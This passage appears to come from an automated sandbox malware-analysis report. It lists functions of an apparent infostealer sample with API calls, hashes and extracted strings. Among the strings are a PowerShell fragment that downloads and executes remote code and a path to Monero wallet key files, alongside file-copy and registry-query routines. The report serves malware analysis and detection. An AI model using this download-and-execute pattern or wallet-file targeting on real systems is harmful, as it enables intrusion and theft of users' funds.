                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00862D04
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00862CC4
                              • <, xrefs: 00862D39
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 48b755dc3363d8593869e1a8dc4622b78ceb13db02dee8bf8b34b521940797ee
                              • Instruction ID: a2b4b98f06bd7e17cd55681fadbd359d201b028d5321d57b9608420b4b7a203a
                              • Opcode Fuzzy Hash: 48b755dc3363d8593869e1a8dc4622b78ceb13db02dee8bf8b34b521940797ee
                              • Instruction Fuzzy Hash: D941CA719102089ADB18EFE4C896BEDBB74FF10300F518169E516F7192EF746A4ACF92
                              Function 00859E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                              Download Yara Rule
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00859F41
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 845afa8ae96800e09e3f38ce1fd186a50465f291700884d075b36b1609aae170
                              • Instruction ID: c97db1b02e616aeaae00a5961bf2049f4b62bf3aaeab5e118da54520818e420a
                              • Opcode Fuzzy Hash: 845afa8ae96800e09e3f38ce1fd186a50465f291700884d075b36b1609aae170
                              • Instruction Fuzzy Hash: 92611D70A10248DBDB18EFA8CC96BED7775FF54345F008118F90AAB291EB746A09CB52
                              Function 00866920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 0086696C
                              • sscanf.NTDLL ref: 00866999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008669B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008669C0
                              • ExitProcess.KERNEL32 ref: 008669DA
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 183c414e3433871d438341a074a2a98cfdb87e37ca069f022755e4bdb0ff8b92
                              • Instruction ID: 5368ce4f5c4d3165021b8220faca9a347ed4f5addf9f2ff5e792e053a5d4f92a
                              • Opcode Fuzzy Hash: 183c414e3433871d438341a074a2a98cfdb87e37ca069f022755e4bdb0ff8b92
                              • Instruction Fuzzy Hash: 4321CB75E14218ABCF08EFE8E9459EEB7B9FF58300F04852AE406E3250EB345615CBA5
                              Function 00867E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00867E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00867E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,015BBC40,00000000,00020119,?), ref: 00867E5E
                              • RegQueryValueExA.ADVAPI32(?,015CD6B8,00000000,00000000,000000FF,000000FF), ref: 00867E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00867E92
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 51b6090aca9a80a919f68537455e15a423c2623f0eaa1bee8864d3d30b6ad129
                              • Instruction ID: 170e96478eaa3d104836984273afc670f8660ae21c2dbcdc82bd13d9f4943a25
                              • Opcode Fuzzy Hash: 51b6090aca9a80a919f68537455e15a423c2623f0eaa1bee8864d3d30b6ad129
                              • Instruction Fuzzy Hash: 1B113AB2A44209EBD700CFD5DD4AFABBBB8FB44B14F10815AFA15E7280DB7558058BE1
                              Function 00869260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrStrA.SHLWAPI(015CD898,?,?,?,0086140C,?,015CD898,00000000), ref: 0086926C
                              • lstrcpyn.KERNEL32(00A9AB88,015CD898,015CD898,?,0086140C,?,015CD898), ref: 00869290
                              • lstrlen.KERNEL32(?,?,0086140C,?,015CD898), ref: 008692A7
                              • wsprintfA.USER32 ref: 008692C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: a51978c54b2d87496477787f6a61a1244d1dc3356367a48758e775404a5804de
                              • Instruction ID: e4481777130b04dc1da8688aa5b71950ff73d47df6088c45a02334825d60b545
                              • Opcode Fuzzy Hash: a51978c54b2d87496477787f6a61a1244d1dc3356367a48758e775404a5804de
                              • Instruction Fuzzy Hash: 77019375600108FFCB04DFECC999AAE7BB9EB58354F108549F9099B244CA71AA419BD2
                              Function 008512A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008512B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008512BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008512D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008512F5
                              • RegCloseKey.ADVAPI32(?), ref: 008512FF
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 4816f60d4f323edb31b40343832a1b8721e0460a8de6301260b0a4a5358fbdb6
                              • Instruction ID: 8632b1c042cfb329edcdaef48d651eef34400ea3f2ab6fd8ce4f4a0ac7745028
                              • Opcode Fuzzy Hash: 4816f60d4f323edb31b40343832a1b8721e0460a8de6301260b0a4a5358fbdb6
                              • Instruction Fuzzy Hash: 5401E6B9B40208BFDB04DFD4DC49FAEB7B8EB58701F108156FA05D7280DA759A058F91
                              Function 00866630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00866663
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00866726
                              • ExitProcess.KERNEL32 ref: 00866755
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: ca85a487b50df118bccf5ed89199e3c0067d5f2f0d1088a03acd8fe9175d09ab
                              • Instruction ID: 0960c3369f2772c63c7cc6fae211f71fe7bac18694840c44480fed0ce593fada
                              • Opcode Fuzzy Hash: ca85a487b50df118bccf5ed89199e3c0067d5f2f0d1088a03acd8fe9175d09ab
                              • Instruction Fuzzy Hash: 98314DB1901218AADB18EB94DC82BDE7B78FF14300F40419AF209B6191DF746B49CF96
                              Function 008687C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00870E28,00000000,?), ref: 0086882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00868836
                              • wsprintfA.USER32 ref: 00868850
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 4eef7ee9b31f185c3dd01f1cccd7304a187ac11594dfeed26718cc3478f74e34
                              • Instruction ID: 09a6ce0e903af0da465b0c0b1d255e013fd29f4eb0ec3b3a3310cb03c86125db
                              • Opcode Fuzzy Hash: 4eef7ee9b31f185c3dd01f1cccd7304a187ac11594dfeed26718cc3478f74e34
                              • Instruction Fuzzy Hash: 7F21FEB1B40208AFDB04DFD4DD49FAEBBB8FB48711F10415AF605E7280CB7999018BA1
                              Function 00868D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0086951E,00000000), ref: 00868D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00868D62
                              • wsprintfW.USER32 ref: 00868D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 17bfc504459bb30e19ab0a319873a7b930d8cf8e7784acb503686dff4aa30fce
                              • Instruction ID: 2a08a16e7e71e11fe4352e5494b1d3d5778764e8a684476e94f3360162e92aa9
                              • Opcode Fuzzy Hash: 17bfc504459bb30e19ab0a319873a7b930d8cf8e7784acb503686dff4aa30fce
                              • Instruction Fuzzy Hash: 6DE046B5A40208BBC700DBD4DC0AA6977B8EB04702F008096FD0986380DA719A019B92
                              Function 0085A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 00868B60: GetSystemTime.KERNEL32(00870E1A,015CA088,008705AE,?,?,008513F9,?,0000001A,00870E1A,00000000,?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 00868B86
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0085A2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 0085A3FF
                              • lstrlen.KERNEL32(00000000), ref: 0085A6BC
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 0085A743
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 6e4cee3fdcbcca69eaa98ceb8054d8dc72266a820671539b6e85ed67a6357703
                              • Instruction ID: c1c38ca902f66c437e159ad8ea1d7a70f0d3de1b15e21255a2010e68a37bcd0d
                              • Opcode Fuzzy Hash: 6e4cee3fdcbcca69eaa98ceb8054d8dc72266a820671539b6e85ed67a6357703
                              • Instruction Fuzzy Hash: E8E1CE729101189ADB09EBA8DD96EEE7338FF24300F518169F516F6091EF346A49CF63
                              Function 0085D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
